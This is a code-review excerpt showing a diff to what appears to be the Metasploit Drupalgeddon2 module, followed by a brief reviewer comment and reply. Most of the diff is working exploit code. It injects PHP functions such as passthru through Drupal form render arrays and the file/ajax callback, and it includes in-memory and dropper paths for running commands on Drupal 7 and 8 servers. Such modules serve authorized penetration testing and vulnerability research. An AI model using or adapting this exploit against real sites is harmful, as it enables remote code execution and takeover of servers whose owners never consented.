modules/exploits/unix/webapp/drupal_drupalgeddon2.rb

```diff
@@ -63,41 +92,130 @@ def check
     CheckCode::Safe
   end
 
-  # TODO: passthru() may be disabled, so try others
-  def exploit(func: 'passthru', code: payload.encoded)
+  def exploit
+    if datastore['PAYLOAD'] == 'cmd/unix/generic'
+      print_warning('Enabling DUMP_OUTPUT for cmd/unix/generic')
+      # XXX: Naughty datastore modification
+      datastore['DUMP_OUTPUT'] = true
+    end
+
+    case target.name
+    when /In-Memory/
+      execute_command(payload.encoded)
+    when /Dropper/
+      execute_cmdstager
+    end
+  end
+
+  def execute_command(cmd, opts = {})
+    # TODO: passthru() may be disabled, so try others
+    func = opts[:func] || datastore['PHP_FUNC'] || 'passthru'
+
+    vprint_status("Executing with #{func}(): #{cmd}")
+
+    res = case target['Version'].to_s
+    when '7.x'
+      exploit_drupal7(func, cmd)
+    when '8.x'
+      exploit_drupal8(func, cmd)
+    end
+
+    unless res && res.code == 200
+      vprint_error("Unexpected final reply: #{res.inspect}")
+      return
+    end
+
+    print_line(res.body) if datastore['DUMP_OUTPUT']
+
+    res
+  end
+
+  def exploit_drupal7(func, code)
+    vars_get = {
+      'name[#post_render][]' => func,
+      'name[#markup]'        => code,
+      'name[#type]'          => 'markup'
+    }
+
+    vars_post = {
+      'form_id'                  => 'user_pass',
+      '_triggering_element_name' => 'name'
+    }
+
     if datastore['CLEAN_URLS']
-      register = '/user/register'
+      uri = normalize_uri(target_uri.path, '/user/password')
     else
-      register = '?q=user/register'
+      uri      = target_uri.path
+      vars_get = {'q' => 'user/password'}.merge(vars_get)
     end
 
-    print_status("Executing on target: #{code}")
-
     res = send_request_cgi(
       'method'    => 'POST',
-      'uri'       => normalize_uri(target_uri.path, register),
-      'vars_get'  => {
-        'element_parents' => 'account/mail/#value',
-        'ajax_form'       => 1,
-        '_wrapper_format' => 'drupal_ajax'
-      },
-      'vars_post' => {
-        'form_id'              => 'user_register_form',
-        '_drupal_ajax'         => 1,
-        'mail[#type]'          => 'markup',
-        'mail[#post_render][]' => func,
-        'mail[#markup]'        => code
-      }
+      'uri'       => uri,
+      'vars_get'  => vars_get,
+      'vars_post' => vars_post
     )
 
-    if res.nil? || res.code != 200
-      print_error("Unexpected reply: #{res.inspect}")
-      return nil
+    unless res && res.code == 200
+      vprint_error("Unexpected intermediate reply: #{res.inspect}")
+      return
     end
 
-    print_line(res.body) if datastore['DUMP_OUTPUT']
+    form_build_id = res.get_html_document.at(
+      '//input[@name = "form_build_id"]/@value'
+    )
 
-    res
+    if form_build_id
+      form_build_id = form_build_id.value
+    else
+      vprint_error("Unknown form_build_id: #{res.inspect}")
+      return
+    end
+
+    vars_get = {
+      'q' => "file/ajax/name/#value/#{form_build_id}"
+    }
```

Comment:
This should also be checked for CLEAN_URLS

Reply:
Oof, good catch.